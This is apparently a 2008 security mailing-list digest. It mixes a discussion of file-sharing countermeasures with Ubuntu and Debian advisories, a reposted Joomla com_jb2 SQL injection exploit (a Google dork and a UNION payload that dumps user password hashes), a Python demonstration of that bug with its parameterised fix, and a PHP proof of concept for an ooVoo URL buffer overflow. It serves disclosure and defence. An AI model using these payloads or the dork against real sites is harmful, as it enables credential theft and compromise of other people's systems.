Re [WEB SECURITY] countermeasure against attacks through HTML shared files
Hello,

I have revised the paper based on the comments, and put the revised version on the Pomcor site, at http://www.pomcor.com/whitepapers/file_sharing_security.pdf (watch for a revision date of November 10; there was an earlier version). The changes include an improvement based on the last post by Bil Corry (see Section 5.1).

Thanks for all the comments!

Francisco
Joomla Component JooBlog 0.1.1 (PostID) SQL Injection Vuln.
This is not created by me; however, many sites are being exploited due to it, so I thought I'd spread the word: http://www.milw0rm.com/exploits/7078

###############################################################
### Joomla Component com_jb2 (PostID) SQL-injection Vulnerability ###
###############################################################
#
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : [EMAIL PROTECTED], KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1.
#
#[!] Module_Name: com_jb2
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:option=com_jb2 PostID
#
###############################################################
#
#[~] Example:
#    http://localhost/Path/index.php?option=com_jb2&PostID=[exploit]
#
#[~] Exploit:
#    -'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/*
#
###############################################################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
###############################################################
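The payload above works because PostID is a numeric parameter that the component pastes straight into the statement: no quote is needed to break out, the /**/ and + are just spaces that survive URL handling, and the trailing /* comments out whatever followed. The following is an added Python example, not the component's code and not the poster's, showing the same bug and its fix on an in-memory SQLite database. The jb2_posts layout (seven columns, matching the seven values in the UNION), the sample rows and the password hash are constructed; jos_users is Joomla 1.x's real user table. The payload is the advisory's, translated from MySQL into SQLite syntax.

```python
import sqlite3


def build_db():
    """In-memory stand-in for the Joomla database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    # jos_users is the real Joomla 1.x user table; the hash:salt value is made up
    conn.execute("CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO jos_users VALUES (62, 'admin', "
                 "'5f4dcc3b5aa765d61d8327deb882cf99:Xr2Q7eLm')")
    # The component's post table is assumed to have seven columns: the advisory's
    # UNION selects seven values, which is how the attacker found that count.
    conn.execute("CREATE TABLE jb2_posts (id INTEGER, title TEXT, body TEXT, "
                 "author TEXT, created TEXT, hits INTEGER, published INTEGER)")
    conn.execute("INSERT INTO jb2_posts VALUES (1, 'First post', 'hello', 'editor', "
                 "'2008-11-10', 3, 1)")
    conn.commit()
    return conn


def get_post_vulnerable(conn, post_id):
    """The pattern behind the advisory: PostID from the query string is concatenated
    into SQL. Because the value is numeric it is not even quoted, so escaping quote
    characters would not help; only a type check or parameter binding does."""
    sql = "SELECT * FROM jb2_posts WHERE id=" + str(post_id)
    return conn.execute(sql).fetchall()


def get_post_safe(conn, post_id):
    """Reject anything that is not an integer, then bind it as a parameter."""
    try:
        pid = int(post_id)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT * FROM jb2_posts WHERE id=?", (pid,)).fetchall()


# The advisory's payload in SQLite spelling: unhex(hex(concat(a,0x3a,b))) becomes
# a||':'||b, the comment-spaces become real spaces, and -- ends the statement the
# way the trailing /* does in MySQL.
PAYLOAD = "-1 UNION SELECT 1,username||':'||password,3,4,5,6,7 FROM jos_users--"


def leak_credentials(conn):
    """Return the username:hash pair the injected UNION row carries in column 2."""
    rows = get_post_vulnerable(conn, PAYLOAD)
    return rows[0][1] if rows else None


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", leak_credentials(db))     # admin:<hash>:<salt>
    print("safe:      ", get_post_safe(db, PAYLOAD))  # []
```

On Joomla 1.5 the equivalent of the int() cast is JRequest::getInt('PostID'); the point is that the type check happens before the value reaches the query, and the query itself never sees attacker text.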
Google Chrome Break
Address spoofing. Already patched. It's in the news last month.

Just a reminder, XCON'08 is coming in a week - check http://xcon.xfocus.org/

greetz to drewcopley, drorshalev, zwell, liuyuer, lqa21, and, of course [EMAIL PROTECTED]

--
http://liudieyu.com/kissofthedragon.32168816196486005/
To be viewed with Google Chrome
Last tested Wednesday, October 29, 2008 at 9:53:18 AM (time zone: UTC/GMT +8 hours)
Up-to-date Google Chrome (version: 0.2.149.30)

Contents
Address spoofing.
1. Address is displayed bbb.org.
2. Contents are not from bbb.org (contents are manipulated).

http://twitter.com/liudieyu

Google Chrome is still virgin - right now only had a bunch of D.o.S, and, a buffer overrun if user saves the attacker's webpage.
[USN-669-1] gnome-screensaver vulnerabilities
===========================================================
Ubuntu Security Notice USN-669-1             November 11, 2008
gnome-screensaver vulnerabilities
CVE-2007-6389, CVE-2008-0887
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  gnome-screensaver               2.14.3-0ubuntu1.1

Ubuntu 7.10:
  gnome-screensaver               2.20.0-0ubuntu4.3

After a standard system upgrade you need to restart all user sessions
on your computer to effect the necessary changes.

Details follow:

It was discovered that the notify feature in gnome-screensaver could
let a local attacker read the clipboard contents of a locked session
by using Ctrl-V. (CVE-2007-6389)

Alan Matsuoka discovered that gnome-screensaver did not properly handle
network outages when using a remote authentication service. During a
network interruption, or by disconnecting the network cable, a local
attacker could gain access to locked sessions. (CVE-2008-0887)

Updated packages for Ubuntu 6.06 LTS:

  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.14.3-0ubuntu1.1.diff.gz
      Size/MD5:    14632 858a17bd71cf1969f89c9f7248840e0b
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.14.3-0ubuntu1.1.dsc
      Size/MD5:     1515 100a66b14d50912bd73b49b6915d849b
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.14.3.orig.tar.gz
      Size/MD5:  2122211 9c95c9d0ad4c44a215546dd4b95992b0

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.14.3-0ubuntu1.1_amd64.deb
      Size/MD5:  1502090 d5bfdd6505afe949c6414fb01dab0bb9

  i386 architecture (x86 compatible Intel/AMD):
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.14.3-0ubuntu1.1_i386.deb
      Size/MD5:  1483824 bcb42c8bb0a73fbc06c5a465a75fa299

  powerpc architecture (Apple Macintosh G3/G4/G5):
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.14.3-0ubuntu1.1_powerpc.deb
      Size/MD5:  1499086 d7e65422d70d2ff6405b0472f03b1c1f

  sparc architecture (Sun SPARC/UltraSPARC):
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.14.3-0ubuntu1.1_sparc.deb
      Size/MD5:  1486326 bff6d9f48780721f2621a0c6895aa143

Updated packages for Ubuntu 7.10:

  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0-0ubuntu4.3.diff.gz
      Size/MD5:    25605 044d070d183f0e073dc1ac81945b0cc5
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0-0ubuntu4.3.dsc
      Size/MD5:     1695 472b10fdbd46177cbe20b58350265d64
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0.orig.tar.gz
      Size/MD5:  2320018 db71d89c66fa3a96b3b276403b5bb723

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0-0ubuntu4.3_amd64.deb
      Size/MD5:  1587388 6655526c8225d3b139eb36c1cbbf948a

  i386 architecture (x86 compatible Intel/AMD):
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0-0ubuntu4.3_i386.deb
      Size/MD5:  1570386 456e6a56f46efac8de675aa906bf70c2

  lpia architecture (Low Power Intel Architecture):
    http://ports.ubuntu.com/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0-0ubuntu4.3_lpia.deb
      Size/MD5:  1569166 c7f1ce80127cd557a78cf9591b36

  powerpc architecture (Apple Macintosh G3/G4/G5):
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0-0ubuntu4.3_powerpc.deb
      Size/MD5:  1606010 a65b33b3a95a7d23bcbdd5e894785852

  sparc architecture (Sun SPARC/UltraSPARC):
    http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0-0ubuntu4.3_sparc.deb
      Size/MD5:  1576698 1566098fa61738a75ecaf0c98886eac1

signature.asc
Description: This is a digitally signed message part
ooVoo 1.7.1.35 (URL Protocol) remote unicode buffer overflow poc
<?php
/*
ooVoo 1.7.1.35 (URL Protocol) remote unicode buffer overflow poc
by Nine:Situations:Group::bruiser

tested against IE8b/xp sp3

9sg site: http://retrogod.altervista.org/
software site: http://www.oovoo.com/

description:
ooVoo is a startup video conferencing and instant messaging application,
similar to Skype Video.[1] ooVoo allows video chats with up to 6 participants,
and unlike Skype Video, does not use a P2P network.[..]

faultmon dump of oovoo.exe processing the url given:

...
04:22:10.875 pid=0E10 tid=0C08 EXCEPTION (first-chance)
Exception C005 (ACCESS_VIOLATION reading [005A])
EAX=0066:     ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00133D44: 6F 00 6F 00 76 00 6F 00-6F 00 3A 00 00 00 0F 00
ECX=:         ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=01D0DC28: 63 00 61 00 6C 00 6C 00-74 00 6F 00 3A 00 00 00
ESP=00133D00: 12 4E 43 00 AA A8 39 06-FF FF FF FF 01 00 00 00
EBP=00133F68: 63 00 63 00 63 00 64 00-64 00 64 00 64 00 65 00
ESI=00133F84: 66 00 00 00 68 B6 A2 01-00 00 00 00 00 00 00 00
EDI=:         ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=0040DF5A: 3B 48 F4 7F 16 52 8D 04-48 50 E8 89 9A 3F 00 83
  -- CMP ECX,[EAX-0C]

04:22:12.015 pid=0E10 tid=0C08 EXCEPTION (first-chance)
Exception C005 (ACCESS_VIOLATION writing [])
EAX=:         ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=:         ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=00610061: 00 00 00 89 84 24 86 00-00 00 89 84 24 8A 00 00
EDX=7C9132BC: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
ESP=00133930: A8 32 91 7C 18 3A 13 00-5C 3F 13 00 34 3A 13 00
EBP=00133950: 00 3A 13 00 7A 32 91 7C-18 3A 13 00 5C 3F 13 00
ESI=:         ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=:         ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=00610061: 00 00 00 89 84 24 86 00-00 00 89 84 24 8A 00 00
  -- ADD [EAX],AL
...

additional notes:
oovoo.exe, compiled with /SafeSEH=OFF

reg key:
HKEY_CLASSES_ROOT\ooVoo\shell\open\command
e:\oovoo\oovoo.exe %1
*/

// 258 U+000F characters after the scheme: the handler is launched with the whole
// "oovoo:..." URL as %1 (see the EBX dump above, "o.o.v.o.o.:" followed by 0F 00)
$bof = "<html><a target=\"_blank\" href=\"oovoo:" . str_repeat("\x0f", 258) . "\">click me</a></html>";
$fp = fopen("oovoo_poc.html", "w+");
fputs($fp, $bof);
fclose($fp);
?>

original url: http://retrogod.altervista.org/9sg_oovoo_url_poc.html
Re: [WEB SECURITY] countermeasure against attacks through HTML shared files
Bil,

>> If the browser displayed the file and the user takes no precautions, the file should be in the browser's cache.
>
> Yngve Pettersen of Opera is working on a proposed browser specification for Context Cache that would allow cached items to expire/be discarded immediately upon logging out:
>
> http://my.opera.com/yngve/blog/2007/02/27/introducing-cache-contexts-or-why-the
> http://www.ietf.org/internet-drafts/draft-pettersen-cache-context-03.txt
>
> An interesting proposal. I know he's looking for feedback on the idea. And of course, all the new stealth modes being built into browsers would also help (they do have use beyond surfing adult-content).

>> To tell you the truth, the original motivation was just that it's not a good idea to have a valid authentication token (the file retrieval session ID) embedded in a URL.
>
> Sure, it can show up in logs, referer, etc. If you don't mind JavaScript, it's easy enough to use JavaScript to submit a POST.

>> There is also a more exotic scenario: the attacker reads the authentication token from the user's computer display, as it is shown in the address box of the browser. These days, with a camera phone, the attacker does not have to be James Bond to pull that off.
>
> You could insert as the first param random junk that's 100 characters long that will push the real token off-screen.

Yes.

>> In any case, I do think now that the file retrieval session ID must remain valid while the login session is valid, in case the browser issues multiple requests for the same file.
>
> No, the thing to do here is a one-time, limited duration key. When the browser first hits the download page using the key, the user is assigned an internal session by the file download site, and the one-time key is voided. No replay attacks. The internal session is used for all subsequent requests. And the key is limited in duration (maybe a minute), so if the user's browser dies or can't reach the download site, the key expires after the time limit.

Yes, good idea.

(I assume that what you mean by key is what I called file retrieval session ID, the internal session is for the purpose of authenticating subsequent requests ***for the same file***, and "the user is assigned an internal session by the download site" means that such an internal session record is created on the server side, and a cookie referring to the internal session is set in the user's browser; this cookie would be specific to the file, and it would be used in addition to the cookie that authenticates application pages and the cookie that authenticates standard-URL requests for user files.)

>> Actually, I think there may be another case where a browser may issue multiple requests (besides the case where a large file download is interrupted), namely to implement sniffing. A browser may download an initial portion of the file to determine its type, and then download the rest. It's not clear to me why a second request would be needed to download the rest, rather than just continuing the download; but I think I remember seeing some version of IE issue a second request, when downloading MS Office documents.
>
> Switching from the one-time key to an internal session ID (as described above) solves these issues.

Yes. (Same assumptions.)

Thanks!

Francisco
[SECURITY] [DSA 1664-1] New ekg packages fix denial of service
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1664-1                  [EMAIL PROTECTED]
http://www.debian.org/security/                    Moritz Muehlenhoff
November 10, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : ekg
Vulnerability  : missing input sanitising
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2008-4776

It was discovered that ekg, a console Gadu Gadu client, performs
insufficient input sanitising in the code that parses contact
descriptions, which may result in denial of service.

For the stable distribution (etch), this problem has been fixed in
version 1:1.7~rc2-1etch2.

For the unstable distribution (sid) and the upcoming stable distribution
(lenny), this problem has been fixed in version 1:1.8~rc1-2 of libgadu.

We recommend that you upgrade your ekg package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2.diff.gz
    Size/MD5 checksum:    37320 1c357cd857b7ef675a14fe103a0965c9
  http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2.orig.tar.gz
    Size/MD5 checksum:   514073 b4ea482130e163af1456699e2e6983d9
  http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2.dsc
    Size/MD5 checksum:      750 0ff1117467170af0a00db3701bfa3e30

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.7~rc2-1etch2_alpha.deb
    Size/MD5 checksum:    75020 32743d8f1c90d89e8fa344609bc3dee3
  http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.7~rc2-1etch2_alpha.deb
    Size/MD5 checksum:   161822 79d864a5bb2b5cf7f099647d92f39a86
  http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2_alpha.deb
    Size/MD5 checksum:   320302 758aa135dad96eda3dff591375046982

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2_amd64.deb
    Size/MD5 checksum:   297518 1c9fcbce7540d6ff538f98710de424b2
  http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.7~rc2-1etch2_amd64.deb
    Size/MD5 checksum:   136580 9ddd7e5e6fb2c3940f426d07bedf3478
  http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.7~rc2-1etch2_amd64.deb
    Size/MD5 checksum:    69742 ce39c6ae5a6b4d6c5f9da1a5b92aee5c

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.7~rc2-1etch2_arm.deb
    Size/MD5 checksum:   135028 c593a1482e5673777dd3b4d1513af5d4
  http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.7~rc2-1etch2_arm.deb
    Size/MD5 checksum:    67986 905284ffdb2f523c175b5b0590e139f5
  http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2_arm.deb
    Size/MD5 checksum:   287590 770c154cbe20f9e5ef9a150eba228f63

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.7~rc2-1etch2_hppa.deb
    Size/MD5 checksum:   143792 879b7e4fa25861fb4b0138a64b20df1a
  http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2_hppa.deb
    Size/MD5 checksum:   310140 5187d07159a4bb9937147f411d4e729c
  http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.7~rc2-1etch2_hppa.deb
    Size/MD5 checksum:    73874 32e077a057c65aeef4f42028c1beb29e

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.7~rc2-1etch2_i386.deb
    Size/MD5 checksum:    67326 e69788fafa929636e435a7c498d6cbb2
  http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2_i386.deb
    Size/MD5 checksum:   287730 bee66bb3ffa81f8d96a611d594c7e6c9
  http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.7~rc2-1etch2_i386.deb
    Size/MD5 checksum:   131298 9455116765cded14599b13def2760856

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2_ia64.deb
    Size/MD5 checksum:   394676 5da127623779c65a6882763d124e106e
  http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.7~rc2-1etch2_ia64.deb
    Size/MD5 checksum:    86672 df4d5a3e854546b2107829cae3c52758
  http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.7~rc2-1etch2_ia64.deb
    Size/MD5 checksum:   158010